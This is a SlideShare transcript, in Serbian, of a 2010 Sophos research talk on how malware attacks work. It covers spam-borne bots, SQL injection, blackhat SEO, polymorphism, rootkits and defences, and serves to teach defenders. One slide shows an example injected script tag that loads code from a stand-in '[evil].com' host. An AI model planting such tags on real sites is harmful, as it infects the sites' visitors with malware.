0
Vanja Svajcer <br />Principal Researcher – Sophos<br />Beograd, 13 Maj 2010<br />Anatomijanapada – duhovi u mašini<br />
Šta radi SophosLabs?<br />Sakuplja pretnje<br />Analizira i klasifikuje <br />Kreira detekcije i otklanja pretnje<br />Obj...
SophosLabsu samom centru<br />
Anatomija napada<br />Postavljanje scenarija<br />Zlonamerni softver (Malware)<br />Tehnike napada<br />Proces analize i a...
Tipovi malicioznog softvera<br />Virus<br />Trojanac<br />Crv (Worm)<br />5<br />
Nema „standardnog“ pisca virusa, nema „standardnog“ motiva za pisanje<br />Školarci<br />Srednjoškolci<br />Studenti<br />...
Virusi se retko viđaju, ali čini se da opet postaju popularni<br />U pitanju je novac<br />U osnovi se svodi na kriminal<b...
APT<br />Advanced Persistent Threat<br />Moderan izraz za “targeted malware”<br />Mala veličina (oko 100k) i posebne namen...
11<br />Email pretnje<br />Druga polovina 2008. bila je svedok dramatičnog porasta malverau obliku priloga email-a<br />20...
12<br />Top spemovani malver (2009)<br />Dominiraju ključne familijemalvera<br />Bredo<br />Waled<br />Jednostavnoali i da...
Socijalni inženjering – Bredo<br />Mal/Bredo<br />Ista kampanja može obuhvatati brojne “različite” priloge<br />
Socijalni inženjering – Zbot (aka Zeus)<br />Mal/Zbot<br />
BredovsZbot<br />Konkurencija između botova!!!<br />Bredopokušava da onemogući bilo koji instalirani Zbot<br />Vrlo slično...
16<br />Email pretnje<br />Globalnespem zamke za praćenje spema<br />SADusmerava više spema nego bilo koja druga pojedinač...
Web najdominantniji<br />99% inficiranih sistema su legitimni kompromitovani sajtovi<br />Sajtovi za napad<br />Botnet C&C...
18<br />
Napadi Web 2.0 aplikacija<br />
Korak1: preusmeravanje sa kompromitovanog sajta<br />Kompromitovani web sajtovi<br />Attacker-controlledredirects<br />Att...
Kompromitovanje hostova<br />21<br />
SQL injection<br />DB<br />DB<br />DB<br />Malicious SQLinjection<br />Hakeri koriste alate da identifikuju stranice poten...
SQL injection<br /><script src=http:/<br /><script src=http:/<br /><script src=http:/<br /><script src=http:/<br /><script...
SQL injection<br />Korisnik se kreće web sajtom<br />Maliciozni skript tag prikrivenoučitava skript sa udaljenog servera<b...
25<br />Demo SQLi + XSS<br />
Novootkrivene inficirane stranice – april 2010<br />26<br />
Blackhat SEO<br />Kompromitovani hostovi zasejani sa SEO-kitovima<br />Povećavaju rangiranje stranice<br />27<br />
SEO trovanje<br />Pretraga po popularnim rečima<br />
Blackhat SEO<br />29<br />
Blackhat SEO<br />30<br />
31<br />Demo Blackhat SEO<br />
Vidljivost – sajtovi koji hostuju SEO-kitove<br />
Korak3: Preuzimanje sadržaja sa napadačevog sajta<br />Kompromitovani web sajtovi<br />Preusmeravanja kojakontroliše napad...
Web napadi<br />Otkriven: 19. oktobra 2009.<br />Izrađen korišćenjem kupljenih kompleta alata<br />MPack, IcePack, GPack,N...
Web napadi<br />Pregled po programimaza pregled Internet sadržaja!<br />Polimorfizam sa serverske strane<br />Procenat pog...
Polimorfizam<br />36<br />
Polimorfizam<br />37<br />
Polimorfizam<br />38<br />
Polimorfizam<br />39<br />
Polimorfizam<br />40<br />
Slabosti polimorfnog malvera<br />Poly-engine je deo koda<br />Može biti reverzovan od strane upornog istraživača<br />Mor...
Polimorfizam sa serverske strane<br />42<br />
Polimorfizam sa serverske strane<br />43<br />
Polimorfizam sa serverske strane<br />44<br />
Polimorfizam sa serverske strane<br />45<br />
46<br />Demo SSP<br />
Korak4: Napadni žrtve kroz ranjivosti, zarazi ih<br />Kompromitovani web sajtovi<br />Preusmeravanja kojakontroliše napada...
Lažni AV profesionalizam<br />
49<br />Video - scareware<br />
Troj/MacSwp<br />50<br /><br />
Zeus (Zbot)<br />Komplet za kreiranje botneta i malvera za krađu informacija<br />Builder<br />Loader<br />Control panel<b...
52<br />Demo Zbot<br />
Zeus (Zbot) - tracker<br />53<br />
54<br />Rootkitovi<br />Programi koji koriste različite tehnike da sakriju svoje prisustvo na računaru<br />Trojanci<br />...
Šta Rootkitovi rade?<br />Listanjefajlova<br />Memo.doc<br />Memo.doc<br />Sales.xls<br />Sales.xls<br />Phish.exe<br />So...
56<br />Demo rootkit<br />
57<br />Vrhunski rootkitovi<br />TDSS (TDL3) <br />MS10-015 update<br />
Vrhunski rootkitovi– Sinowal (Mebroot)<br />InficiraMBR (poput starih boot sektor virusa)<br />ModifikujeOS loader da učit...
Rootkitovi– Sinowal (Mebroot)	<br />CPU Real mode<br />CPU Protected mode<br />BIOS<br />initialization<br />MBR<br />Boot...
Sinowal geografsko širenje(Sinowal, Feb-Mar 2010)<br />
61<br />Vrhunski rootkitovi budućnosti<br />Rootkitovi za virtualizaciju<br />Softver(Subvirt)<br />Uz pomoć hardvera (Blu...
Rootkitovi za virtualizaciju<br />Aplikacija 1<br />OSg1<br />OSg2<br />Aplikacija 2<br />VMM<br />Rootkit za virtualizaci...
Rootkitovi za virtualizaciju<br />OSg3<br />OSg2<br />OSg1<br />Domen 0<br />Hardver<br />Rootkit za virtualizaciju – mali...
SophosLabs™<br />
Pregled<br />65<br />50000<br />
SophosLabssistemi<br />
67<br />Demo lab sistemi<br />
Tehnologija zaštite<br />Inspekcija sadržaja (klasično skeniranje)<br />Detekcija na bazi ponašanja (HIPS)<br />Reputacija...
Životni ciklus familije malvera<br />Prvi član porodice<br />Analiza<br />Detekcija<br />TEST<br />Objava<br />Sledeći čla...
Karakteristike familije<br />Identične osnovne funkcionalnosti<br />Nove varijante mogu imati dodatne funkcionalnosti<br /...
Grafički prikaz aplikativnih zahteva<br />
Spakovan -> Raspakovan<br />
„Runtime behavioral“zaštita<br />Nadopunjuje Behavioral Genotype<br />Proverava ponašanje procesa primenjenona sistemu<br ...
Registracija urun ključu<br /><ul><li> Pokreće se proces virus.exe...
Hmmm, OK.Skeniram na viruse…
Ništa nije pronađeno.
Virus.exe otvararegistry run ključ...
Zanimljivo. Reci mi nešto više o tome.
Virus.exe se registruje u run ključ…
Hmmm, ne, to nije OK.Blokiraj operaciju!!!
Operacija blokirana.
Upcoming SlideShare
Loading in...5
×

Anatomija napada – duhovi u mašini

914

Published on

Prezentacija "Anatomija napada – duhovi u mašini" koju je Vanja Švajcer održao na Sophos seminaru u maju 2010. godine.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
914
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
16
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "Anatomija napada – duhovi u mašini"

  1. 1. Vanja Svajcer <br />Principal Researcher – Sophos<br />Beograd, 13 Maj 2010<br />Anatomijanapada – duhovi u mašini<br />
  2. 2. Šta radi SophosLabs?<br />Sakuplja pretnje<br />Analizira i klasifikuje <br />Kreira detekcije i otklanja pretnje<br />Objavljuje sveže definicije i informacije<br />Istraživanje i razvoj<br />Nešto više informacija videćemo kasnije<br />2<br />
  3. 3. SophosLabsu samom centru<br />
  4. 4. Anatomija napada<br />Postavljanje scenarija<br />Zlonamerni softver (Malware)<br />Tehnike napada<br />Proces analize i alati<br />Tehnologija zaštite<br />4<br />
  5. 5. Tipovi malicioznog softvera<br />Virus<br />Trojanac<br />Crv (Worm)<br />5<br />
  6. 6. Nema „standardnog“ pisca virusa, nema „standardnog“ motiva za pisanje<br />Školarci<br />Srednjoškolci<br />Studenti<br />IT profesionalci<br />Uglavnom muškarci<br />Nikako A/V kompanije<br />Ko se nekada bavio pisanjem virusa?<br />
  7. 7.
  8. 8.
  9. 9. Virusi se retko viđaju, ali čini se da opet postaju popularni<br />U pitanju je novac<br />U osnovi se svodi na kriminal<br />( I dalje postoji tamo neki pegavi tinejdžer…)<br />Ko piše malver danas?<br />
  10. 10. APT<br />Advanced Persistent Threat<br />Moderan izraz za “targeted malware”<br />Mala veličina (oko 100k) i posebne namene<br />Nema pakovanja<br />Izgleda kao legitiman Windows fajl<br />Neovlašćeni prikriveni transfer podataka (Data Exfiltration)<br />Težak za uklanjanje<br />10<br />
  11. 11. 11<br />Email pretnje<br />Druga polovina 2008. bila je svedok dramatičnog porasta malverau obliku priloga email-a<br />2009.taj trend se nastavlja,nekoliko familija se širi agresivnimmasovnim spemovanjem<br />Iste stare taktike socijalnog inženjeringa<br />UPS/FedEx failed deliveryreports, Microsoft patches,Airline e-tickets itd.<br />
  12. 12. 12<br />Top spemovani malver (2009)<br />Dominiraju ključne familijemalvera<br />Bredo<br />Waled<br />Jednostavnoali i dalje radi!<br />
  13. 13. Socijalni inženjering – Bredo<br />Mal/Bredo<br />Ista kampanja može obuhvatati brojne “različite” priloge<br />
  14. 14. Socijalni inženjering – Zbot (aka Zeus)<br />Mal/Zbot<br />
  15. 15. BredovsZbot<br />Konkurencija između botova!!!<br />Bredopokušava da onemogući bilo koji instalirani Zbot<br />Vrlo slično poput NetskyvsBaglerata od pre par godina!!!<br />
  16. 16. 16<br />Email pretnje<br />Globalnespem zamke za praćenje spema<br />SADusmerava više spema nego bilo koja druga pojedinačna država<br />Kompromitovani računari ne samo što šire spem već distribuiraju malver i lansiraju DDoS napade<br />
  17. 17. Web najdominantniji<br />99% inficiranih sistema su legitimni kompromitovani sajtovi<br />Sajtovi za napad<br />Botnet C&C korišćenjem HTTP<br />Napadi i dalje često počinju spemovanjem email-a<br />17<br />
  18. 18. 18<br />
  19. 19. Napadi Web 2.0 aplikacija<br />
  20. 20. Korak1: preusmeravanje sa kompromitovanog sajta<br />Kompromitovani web sajtovi<br />Attacker-controlledredirects<br />Attack site usingbundle of exploits<br />Payload<br />
  21. 21. Kompromitovanje hostova<br />21<br />
  22. 22. SQL injection<br />DB<br />DB<br />DB<br />Malicious SQLinjection<br />Hakeri koriste alate da identifikuju stranice potencijalno ranjive na SQL injection<br />Šalju maliciozneHTTP zahteve (Demo)<br />
  23. 23. SQL injection<br /><script src=http:/<br /><script src=http:/<br /><script src=http:/<br /><script src=http:/<br /><script src=http:/<br /><script src=http:/<br /><script src=http:/<br /><script src=http://[evil].com/file.js<br />SQL injection uzrokuje da baza podataka postane zabiberena malicioznim skript tagovima<br />Kao rezultat, stranice na web serveru izgrađene od podataka preuzetih iz baze takođe sadrže maliciozne skript tagove<br />
  24. 24. SQL injection<br />Korisnik se kreće web sajtom<br />Maliciozni skript tag prikrivenoučitava skript sa udaljenog servera<br />Žrtva postaje inficirana malverom:Asproxtrojan<br />
  25. 25. 25<br />Demo SQLi + XSS<br />
  26. 26. Novootkrivene inficirane stranice – april 2010<br />26<br />
  27. 27. Blackhat SEO<br />Kompromitovani hostovi zasejani sa SEO-kitovima<br />Povećavaju rangiranje stranice<br />27<br />
  28. 28. SEO trovanje<br />Pretraga po popularnim rečima<br />
  29. 29. Blackhat SEO<br />29<br />
  30. 30. Blackhat SEO<br />30<br />
  31. 31. 31<br />Demo Blackhat SEO<br />
  32. 32. Vidljivost – sajtovi koji hostuju SEO-kitove<br />
  33. 33. Korak3: Preuzimanje sadržaja sa napadačevog sajta<br />Kompromitovani web sajtovi<br />Preusmeravanja kojakontroliše napadač<br />Sajt za napad koristi više kombinovanih ranjivosti<br />Payload<br />
  34. 34. Web napadi<br />Otkriven: 19. oktobra 2009.<br />Izrađen korišćenjem kupljenih kompleta alata<br />MPack, IcePack, GPack,Neosploit, Eleonore, Yes<br />Konzola za upravljanje<br />Phishing<br />Najpogođenije države:<br />Francuska – 4%<br />SAD– 17%<br />Velika Britanija – 3%<br />Nemačka – 6%<br />
  35. 35. Web napadi<br />Pregled po programimaza pregled Internet sadržaja!<br />Polimorfizam sa serverske strane<br />Procenat pogođenih:<br /> MSIE – 12%<br />FireFox – 1%<br /> Opera – 5%<br />
  36. 36. Polimorfizam<br />36<br />
  37. 37. Polimorfizam<br />37<br />
  38. 38. Polimorfizam<br />38<br />
  39. 39. Polimorfizam<br />39<br />
  40. 40. Polimorfizam<br />40<br />
  41. 41. Slabosti polimorfnog malvera<br />Poly-engine je deo koda<br />Može biti reverzovan od strane upornog istraživača<br />Mora biti dekriptovan u memoriji<br />Emulira programski kod dok se ne nađe prava varijanta<br />Detekcija može biti bazirana po proceduri dekripcije<br />41<br />
  42. 42. Polimorfizam sa serverske strane<br />42<br />
  43. 43. Polimorfizam sa serverske strane<br />43<br />
  44. 44. Polimorfizam sa serverske strane<br />44<br />
  45. 45. Polimorfizam sa serverske strane<br />45<br />
  46. 46. 46<br />Demo SSP<br />
  47. 47. Korak4: Napadni žrtve kroz ranjivosti, zarazi ih<br />Kompromitovani web sajtovi<br />Preusmeravanja kojakontroliše napadač<br />Sajt za napad koristiviše kombinovanih ranjivosti<br />Tovar<br />
  48. 48. Lažni AV profesionalizam<br />
  49. 49. 49<br />Video - scareware<br />
  50. 50. Troj/MacSwp<br />50<br /><br />
  51. 51. Zeus (Zbot)<br />Komplet za kreiranje botneta i malvera za krađu informacija<br />Builder<br />Loader<br />Control panel<br />51<br />
  52. 52. 52<br />Demo Zbot<br />
  53. 53. Zeus (Zbot) - tracker<br />53<br />
  54. 54. 54<br />Rootkitovi<br />Programi koji koriste različite tehnike da sakriju svoje prisustvo na računaru<br />Trojanci<br />Legitimni programi?<br />
  55. 55. Šta Rootkitovi rade?<br />Listanjefajlova<br />Memo.doc<br />Memo.doc<br />Sales.xls<br />Sales.xls<br />Phish.exe<br />Sophos.ppt<br />Listanjefajlova<br />Anti-Virus<br />skener<br />Rootkit<br />Operativni<br />sistem<br />Phish.exe<br />Sophos.ppt<br />
  56. 56. 56<br />Demo rootkit<br />
  57. 57. 57<br />Vrhunski rootkitovi<br />TDSS (TDL3) <br />MS10-015 update<br />
  58. 58. Vrhunski rootkitovi– Sinowal (Mebroot)<br />InficiraMBR (poput starih boot sektor virusa)<br />ModifikujeOS loader da učita maliciozni drajver<br />Drajver sakriva maliciozniMBR (stealth)<br />Instalira prilagođenimrežni stek<br />Sadržibackdoor (enkriptovanaHTTP komunikacija)<br />Tovar– ubrizgava maliciozne DLL-ove<br />Pseudo-nasumično generisanje URL-ova zaupdate (dnevni)<br />
  59. 59. Rootkitovi– Sinowal (Mebroot) <br />CPU Real mode<br />CPU Protected mode<br />BIOS<br />initialization<br />MBR<br />Boot loader<br />Early kernel<br />initialization<br />Kernel<br />initialization<br />MBR<br />Boot loader<br />Early kernel<br />initialization<br />User process<br />Endpoint<br />security<br />User process<br />Sinowal<br />dropper<br />User process<br />Read <br />MBR<br />BIOS services<br />Window services<br />Window services<br />Hard disk<br />
  60. 60. Sinowal geografsko širenje(Sinowal, Feb-Mar 2010)<br />
  61. 61. 61<br />Vrhunski rootkitovi budućnosti<br />Rootkitovi za virtualizaciju<br />Softver(Subvirt)<br />Uz pomoć hardvera (Bluepill, Vitriol)<br />Bootkitovi (eEye, vBootkit, Stoned)<br />SMM bazirani rootkitovi<br />Bios/EFI bazirani rootkitovi?<br />
  62. 62. Rootkitovi za virtualizaciju<br />Aplikacija 1<br />OSg1<br />OSg2<br />Aplikacija 2<br />VMM<br />Rootkit za virtualizaciju<br />OS<br />Hardver<br />
  63. 63. Rootkitovi za virtualizaciju<br />OSg3<br />OSg2<br />OSg1<br />Domen 0<br />Hardver<br />Rootkit za virtualizaciju – maliciozni hipervizor<br />
  64. 64. SophosLabs™<br />
  65. 65. Pregled<br />65<br />50000<br />
  66. 66. SophosLabssistemi<br />
  67. 67. 67<br />Demo lab sistemi<br />
  68. 68. Tehnologija zaštite<br />Inspekcija sadržaja (klasično skeniranje)<br />Detekcija na bazi ponašanja (HIPS)<br />Reputacija<br />Domen<br />Fajl<br />68<br />
  69. 69. Životni ciklus familije malvera<br />Prvi član porodice<br />Analiza<br />Detekcija<br />TEST<br />Objava<br />Sledeći član porodica<br />
  70. 70. Karakteristike familije<br />Identične osnovne funkcionalnosti<br />Nove varijante mogu imati dodatne funkcionalnosti<br />Linije koda se ponovo upotrebljavaju<br />Nakon rekompilacije, nova varijanta je binarno različita<br />Tradicionalno skeniranje nije efikasno za proaktivnu detekciju familije<br />Zahteva analizu na funkcionalnom nivou<br />
  71. 71. Grafički prikaz aplikativnih zahteva<br />
  72. 72. Spakovan -> Raspakovan<br />
  73. 73. „Runtime behavioral“zaštita<br />Nadopunjuje Behavioral Genotype<br />Proverava ponašanje procesa primenjenona sistemu<br />Proverava sve pokrenute procese na znake malicioznih modifikacija sistemskih objekata<br />Fajlove<br />Registry unose<br />Procese<br />Mrežne konekcije<br />Učitane drajvere<br />
  74. 74. Registracija urun ključu<br /><ul><li> Pokreće se proces virus.exe...
  75. 75. Hmmm, OK.Skeniram na viruse…
  76. 76. Ništa nije pronađeno.
  77. 77. Virus.exe otvararegistry run ključ...
  78. 78. Zanimljivo. Reci mi nešto više o tome.
  79. 79. Virus.exe se registruje u run ključ…
  80. 80. Hmmm, ne, to nije OK.Blokiraj operaciju!!!
  81. 81. Operacija blokirana.
  82. 82. Hvala ti kernele!
  83. 83. Izveštavam o ponašanju.</li></ul>Uprošćena runtime arhitektura<br />Privileged – kernel mode<br />Non-privileged – user mode<br />Virus.exe<br />
  84. 84. Buffer overflow zaštita<br />Generičkatehnologijaza detekciju zloupotrebe propusta (uključujući tzv. zero day zloupotrebe)<br />Nadopunjuje Windows DEP<br />Detektuje različite buffer overflow napade<br />Stack<br />Heap<br />Return to lib C<br />Štiti Microsoft i ne-Microsoft procese, uglavnom sa klijentske strane<br />
  85. 85. Buffer overflow – uprošćena arhitektura<br /><ul><li>Preuzimam fajl…
  86. 86. Zanimljivo, odakle dolaziš?
  87. 87. Internet Explorer programski kod.
  88. 88. OK.
  89. 89. Preuzimam fajl2...
  90. 90. Oh, ne opet.Odakle dolaziš?
  91. 91. Stack.
  92. 92. Oh, ne. Buffer overflow detektovan!!!
  93. 93. Suspendujem proces.
  94. 94. Prijavljujem ponašanje.</li></ul>Iexplore.exe<br />
  95. 95. Cloud computing<br />77<br />
  96. 96. Cloud zaštita<br />Pretrage u realnom vremenu<br />Povratne informacije u realnom vremenu (zaštita zajednice)<br />Socijalno umrežavanje vezano za bezbednost<br />Premošćavanje prekida u zaštiti<br />Unapređenje vremena odziva<br />78<br />
  97. 97. Proaktivno vs reaktivno<br />79<br />
  98. 98. Zaključak<br />Malver postaje sve kompleksniji<br />Finansijska motivacija<br />Usmereni (targeted) malver može predstavljati izazov<br />Security zajednica ne gubi bitku<br />Stalno se razvijaju nove metode<br />Tehnologija ne predstavlja „srebrni metak“<br />80<br />
  99. 99. vanja.svajcer@sophos.com<br />Blog: http://www.sophos.com/blogs/sophoslabs<br />Twitter: http://twitter.com/sophoslabs<br />Pitanja?<br />
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×